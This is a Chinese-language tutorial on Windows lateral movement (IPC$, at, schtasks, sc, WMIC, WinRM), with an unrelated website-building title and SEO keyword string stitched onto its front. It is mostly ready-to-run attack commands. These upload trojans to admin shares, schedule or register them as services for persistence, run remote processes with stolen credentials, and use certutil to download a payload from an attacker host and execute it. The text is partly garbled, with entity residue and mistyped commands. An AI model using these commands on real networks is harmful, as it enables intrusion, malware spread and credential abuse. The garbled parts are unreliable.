企业官网建设流程全解析

视频相亲网站开发成本,framer网页界面设计,wordPress紧凑主题,wordpress社区论坛模板1、横向移动介绍 当攻击者在拿下一台内网主机后#xff0c;通常会利用当前拿下的机器当作跳板#xff0c;进一步攻击内网其他主机#xff0c;扩大攻击影响范围。 横向移动的三个阶段#xff1a;前期准备#xff08;主机信息的收集#xff0c;植入持久化后门#xff08…1、横向移动介绍当攻击者在拿下一台内网主机后通常会利用当前拿下的机器当作跳板进一步攻击内网其他主机扩大攻击影响范围。横向移动的三个阶段前期准备主机信息的收集植入持久化后门如修改注册表内网探测与路径寻找阶段凭证窃取使用crackmapexec 密码喷射内网扫描目标渗透与控制权拓展阶段复用前期准备的操作逐步向拿下整个内网推进2、IPC$1IPC$简介IPC$(Internet Process Connection)是共享命名管道的资源它是为了让进程间通信而开放的命名管道通过提供可信任的用户名和口令连接双方可以建立安全的通道并以此通道进行加密数据的交换从而实现对远程计算机的访问。利用IPC$,连接者与目标主机利用建立的连接可以得到目标主机上的目录结构、用户列表等信息。进程通信一文搞懂六大进程通信机制原理(全网最详细) - 知乎2使用条件1.开放了139、445端口我们可以通过139和445端口来实现对共享文件/打印机的访问因此一般来讲IPC$连接是需要139或445端口来支持的IPC$连接可以实现远程登陆及对默认共享的访问而139端口的开启表示netbios协议的应用。IPC$连接默认会走445端口不通的话则会走139端口这两个端口都可以单独实现文件共享2.目标开启IPC$文件共享服务及默认共享默认共享是为了方便管理员远程管理而默认开启的共享。所有逻辑磁盘(c$、d$、e$.)和系统目录WINNT或WINDOWS(ADMIN:$),通过IPC连接可以实现对这些默认共享的访问3、需要目标机器的管理员账号和密码默认情况下只有被添加到远程计算机管理员组的域用户域管用户有权限对admin$目录建立IPC连接本地的Administrator用户也可以如果启用了该用户那么也可以使用Administrator用户远程连接3常用命令查看连接情况net use连接net use\\IP\ipc$ /user:useername password域下连接net use\\IP\ipc$ /user:域名\useername password查看目标主机时间net time \\目标ip文件上传copy start.exe \\目标IP\c$\target.exe文件下载copy \\目标IP\c$\target.exe c:\tools\target.exe查看目标主机文件dir \\目标IP\c$查看共享的资源net share删除共享的资源net share C$ /del共享计算机的c盘net share C$c:\开放ipc$的共享net share ipc$关闭ipc$的共享net share ipc$ /del映射共享磁盘到本地znet use z: \\目标IP\c$ /user:username PASSWORD删除连接net use \\目标IP\ipc$ /del删除所有连接net use * /del /y4IPC$连接失败常见错误号3、IPCAT1AT简介AT命令可在指定时间和日期、在指定计算机上运行命令和程序。AT命令在windows server2012等新版系统中已被弃用新版使用schtasksAT命令如果找不到网络路径则判断是目标主机已禁用Task Schedu1ler服务·问题执行at命令时显示绑定句柄无效。·解决echo1g.10.11.1 30 RemoteHostC:\Windows\System32\drivers\etc\hosts2利用1、建立连接net use \\目标IP\c$ /user:administrator password2、通过文件共享上传木马到目标主机copy b7.exe \\目标IP\c$\b7.exedir \\目标IP\c$3、查看远程主机时间net time \\目标IP4、at命令添加任务at \\目标IP 17:28 c:\b7.exe目标主机会在17点28执行b7程序5、at命令查看任务at \\目标IP6、at命令删除任务at \\目标IP 1 /delete删除任务14、IPC$schtasks1schtasks简介schtasks可以理解为新版at允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务/Create 创建新计划任务。/Delete 删除计划任务。/Query 显示所有计划任务。/Change 更改计划任务属性。/Run 按需运行计划任务。/End 中止当前正在运行的计划任务。/ShowSid 显示与计划的任务名称相应的安全标识符。/sc 指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。/mo 指定任务在其计划类型内的运行频率。这个参数对于 MONTHLY 计划是必需的。对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划这个参数有效但也可选。默认值为 1。/tr 指定任务运行的程序或命令。如果忽略该路径SchTasks.exe 将假定文件在 Systemroot\System32 目录下。/tn 指定任务的名称。/? 显示此帮助消息。2命令格式## 工作组# 创建任务schtasks /create /tn 任务名 /s 机器IP /U 主机名\用户 /P 密码 /tr 命令 /sc ONSTART /RU system# 运行任务schtasks /run /tn 任务名 /s 机器IP /U 主机名\用户 /P 密码# 删除任务schtasks /F /delete /tn 任务名 /s 机器IP /U 主机名\用户 /P 密码## 域环境# 创建任务schtasks /create /tn 任务名 /s 域机器IP /U 域\域用户 /P 域用户密码 /tr 命令 /sc ONSTART /RU system# 运行任务schtasks /run /tn 任务名 /s 域机器IP /U 域\域用户 /P 域用户密码# 删除任务schtasks /F /delete /tn 任务名 /s 域机器IP /U 域\域用户 /P 域用户密码3利用1、建立IPC连接net use \\10.10.10.20 /user:administrator passwordnet use2、通过文件共享上传木马到目标主机copy b7.exe \\目标IP\c$\b7.exedir \\目标IP\c$3、使用schtasks在远程主机创建定时任务要先更改编码chcp 65001schtasks /create /s 目标·IP /u web\administrator /p password /sc MINUTE /mo 1 /tn test /tr c:\\b7.exe/tr c:\b7.exe任务要执行的程序 / 命令这里是运行远程主机C盘下的b7.exe/sc MINUTE任务的触发周期类型这里是 “每分钟”/mo 1周期的间隔数配合/sc MINUTE表示 “每 1 分钟执行一次”4、查看远程主机创建的定时任务schtasks /query /s 目标IP /tn test /u web\administrator /p password5、运行/删除远程主机的计划任务schtasks /run /s 目标IP /u web\administrator /p password /tn testschtasks /delete /f /s 目标IP /tn test /u web\administrator /p password5、IPCSC1SC简介SC命令可以注册、删除和查询系统服务2常用指令创建服务sc create [service_name] binpath D:\test\test.exe查询服务sc query [service_name]删除服务sc \\目标IP delete [service_name]启动服务sc \\目标IP start [service_name]停止服务sc \\目标IP stop [service_name]3利用1、首先就是把木马上传到目标——ps生成的木马要是服务型可执行文件如msf时-f exe-servicecopy bs8.exe \\目标IP\c$\bs8.exedir \\目标IP\c$通过msf上传upload /root/shell/bs8.exe c:/bs8.exe2、远程主机上创建并启动服务# 本地系统启动时启动服务sc \\目标IP create test binpath c:\bs8.exe passwordpasswordsc \\10.10.10.20指定操作的远程主机 IP10.10.10.20create test创建一个名为test的新服务binpath c:\bs8.exe指定服务对应的可执行文件路径即之前生成的恶意程序bs8.exepassword password这里是本地系统账户的密码默认用LocalSystem账户运行服务系统启动时自动加载# 当 web\administrator 用户登录时启动服务sc \\目标IP create test binpath c:\bs8.exe obj web\administrator password passwordobj web\administrator指定服务的运行账户为web主机下的administrator用户效果当web\administrator用户登录目标主机时这个服务才会启动更隐蔽的触发条件# sc查询服务信息sc \\目标IP qc test注意binpath设置选项后面有一个空格6、WMIC1wmic简介WMl:(Windows Management Instrumentation Windows管理规范)是用户管理本地和远程计算机的一种模型。通过它可以访问、配置、管理和监视几乎所有的Windows资源。WM的语法十分简单基本上常见的命名空间、对象等用几乎一模一样。它对应的是Windows.里的WMl服务(winmgmt)。在windows2000之后的操作系统中内置了该服务。WMI使用公共信息模型(CIM)表示托管组件其中包括系统、应用程序、网络等等。CM中使用类表示管理对象命名空间是一个类的集合。通过使用135端口上的远程过程调用(RPC)进行通信以进行远程访问它允许系统管理员远程执行自动化管理任务例如远程启动服务或执行命令。详细参考https:∥docs.microsoft..com/zh-cn/windows./win32/wmisdk/.wmic简而言之WMI是一种接口WMIC是为WMI提供的命令行界面。2使用条件1.Windows Management Instrumentation服务开启端口TCPl35,默认开启2.防火墙允许135、445等端口通信3命令格式wmic [全局开关] 别名 动词 [参数]常用全局开关包括/node指定目标计算机/user/password指定远程登录凭据/output输出重定向/namespace指定命名空间常用动词GET获取属性值LIST列出对象信息支持BRIEF、FULL等CALL调用方法CREATE/DELETE/SET创建、删除或修改对象# 查看所有进程wmic process list brief# 按名称结束进程wmic process where nameqq.exe call terminate# 创建新进程wmic process call create notepad.exe# 启动服务wmic service where nameserver_name call startservice# 停止服务wmic service where nameserver_name call stopservice# 修改启动类型wmic service where nameserver_name set StartModeauto# 查看CPU型号wmic cpu get Name# 获取BIOS详细信息wmic bios list full# 获取物理磁盘信息wmic diskdrive get Caption,Size,InterfaceType# 在远程主机执行命令wmic /node:192.168.1.10 /user:admin /password:123456 process call create cmd.exeprocess call是调用 进程4利用1、查询进程信息wmic /node:IP /user:administrator /password:password process list briefPS:因为 WMIC 本身不能直接执行命令但可以通过 “启动cmd.exe进程 让cmd去执行命令” 的间接方式实现 “执行命令” 的效果2、利用create创建进程wmic /node:IP /user:administrator /password:password process call create cmd /c calc.exe如果出现User credentials cannot be used for local connections,应该是调用calc,exe程序权限不够的问题如果出现Description无法启动服务原因可能是已被禁用或与其相关联的设备没有启动判断WMI服务被禁用wmic命令缺点是没有回显3、下载远程文件并执行wmic /node:IP /user:administrator /password:password process call create cmd /c certutil.exe -urlcache -split -f http://vpsip/b7.exe c:/windows/temp/b7.exe c:/windows/temp/b7.execertutil.exeWindows 自带的证书管理工具可被利用于下载文件-urlcachecertutil.exe的参数操作 URL 缓存下载文件本质是缓存远程 URL 的内容-split将下载内容保存为文件-f强制覆盖已存在的文件cmd /c执行后面的命令后自动关闭cmd窗口7、WINRM1WinRMi简介WinRM指的是Windows远程管理服务通过远程连接winRM模块可以操作windows命令行默认监听端口5985(HTTP)和5986(HTTPS),在2012及以后默认开启.2利用1、判断本地是否开启三种方法远程的话就是扫描端口用txportmap等端口扫描工具winrm enumerate winrm/config/listenernetstat -ano | findstr 5985wmic service list brief | findstr WinRM2、查看远程winrm服务是否正常powershell -c test-wsman IPPowerShell 执行Test-WSMan命令检查远程主机的 WinRM 服务端口默认 5985/5986是否开放、服务是否响应。结果若返回 WinRM 版本等信息说明服务正常若报错如连接超时则服务未正常运行。3、开启winrm服务winrm quickconfig注意需以管理员权限运行该命令。查看 WinRM 监听配置命令winrm enumerate winrm/config/listener作用查看本地 WinRM 服务的 “监听配置”即 WinRM 服务绑定的 IP、端口、协议等信息。4、允许远程主机访问winrm set winrm/config/client {TrustedHosts*}作用将 “所有远程主机” 加入本地 WinRM 客户端的 “信任主机列表TrustedHosts”。逻辑WinRM 默认仅信任 “同域主机”若要访问非域主机需将其 IP / 主机名加入 TrustedHosts这里用*表示信任 “任意远程主机”属于宽松配置实际场景可指定具体 IP / 主机名如TrustedHosts10.10.10.20,192.168.1.1。注意修改后立即生效无需重启服务。{TrustedHosts*}TrustedHosts配置项名称翻译为 “信任主机列表”5、winrs执行命令winrs -r:http://目标IP:5985 -u:administrator -p:password ipconfigwinrs -r:http://目标IP:5985 -u:administrator -p:password cmd.exe6、wimrm横向移动1、利用winrm参数选项中的invoke参数来对目标对象执行特定的方法。winrm invoke create wmicimv2/win32 process fCommandlinecalc.exe}不-r默认本地开启命令调用了Windows WMIE中Win32_process类的Create方法生成了一个calc.exe的新进程2、在远程机器上打开进程winrm invoke create wmicimv2/win32_process {Commandlinecalc.exe} -r:http://目标IP:5985 -u:administrator -p:password3、在远程机器上创建服务winrm invoke Create wmicimv2/Win32_Service {Nametest;DisplayNametest;PathNamecm d.exe /c c:\b7.exe}-r:http://目标IP:5985 -u: administrator -p:passwordwinrm invokeWinRM 的 “调用操作” 命令用于触发远程 WMI 类的方法这里是调用Win32_Service的Create方法。Create要调用的 WMI 方法Win32_Service类的Create方法作用是 “创建 Windows 服务”。wmicimv2/Win32_ServiceWMI 类的路径root/cimv2命名空间下的Win32_Service类用于管理 Windows 服务。{Nametest;DisplayNametest;PathNamecmd.exe /k c:\b7.exe}传递给Create方法的服务配置参数多个参数用分号分隔-Name服务的 “服务名”系统内部标识需唯一-DisplayName服务的 “显示名称”在服务管理器中看到的名称-PathName服务对应的 “可执行程序路径 参数”这里是通过cmd.exe启动c:\b7.exe/k表示执行后保留 cmd 窗口。ps这里建议/c-r:http://目标IP:5985指定远程目标主机-r是remote的缩写-http://是 WinRM 的传输协议默认 HTTP 用 5985 端口HTTPS 用 5986 端口-目标IP:5985是远程主机的 IPWinRM 端口。4、在远程机器上启动服务winrm invoke StartService wmicimv2/Win32_Service?Nametest -r:http://目标IP:5985 -u:administrator -p:password这里name不能换成 {Commandlinecalc.exe}服务和进程不一样